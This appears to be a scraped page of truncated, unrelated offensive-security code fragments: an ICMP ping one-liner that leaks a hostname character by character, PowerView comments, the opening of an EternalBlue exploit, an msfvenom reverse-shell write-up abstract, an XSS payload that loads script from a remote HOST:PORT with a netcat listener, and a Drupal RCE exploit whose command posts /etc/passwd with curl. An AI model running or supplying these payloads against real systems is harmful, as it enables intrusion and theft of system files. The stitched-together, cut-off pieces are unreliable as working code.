| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb, ntlm | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
| Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
| Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
| #!/usr/bin/python | |
| from scapy.all import * | |
| import time, sys | |
| pkts = rdpcap(sys.argv[1]) | |
| clk = pkts[0].time | |
| for p in pkts: | |
| time.sleep(p.time - clk) | |
| clk = p.time | |
| sendp(p) |
| wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz |
#PHP Session Data Injection Vulnerability
Taoguang Chen <@chtg57> - Write Date: 2016.7.27 - Release Date: 2016.8.18
PHP's session php/php_binary handlers wrongly handles the session name cause arbitrarily session data injection.
Affected is PHP 5 < 5.6.25
Affected is PHP 7 < 7.0.10
| <?php | |
| # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) | |
| # https://www.drupal.org/node/2765575 | |
| # by Raz0r (http://raz0r.name) | |
| $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; | |
| $host = "http://localhost:81/drupal-7.12/"; | |
| $a = array( |